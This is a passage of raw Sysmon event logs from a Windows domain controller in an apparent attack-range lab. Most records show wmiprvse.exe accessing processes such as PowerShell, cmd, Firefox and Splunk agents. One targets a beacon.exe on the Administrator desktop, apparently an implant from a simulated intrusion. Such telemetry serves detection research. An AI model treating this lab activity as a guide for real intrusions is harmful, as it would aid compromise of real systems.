16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program 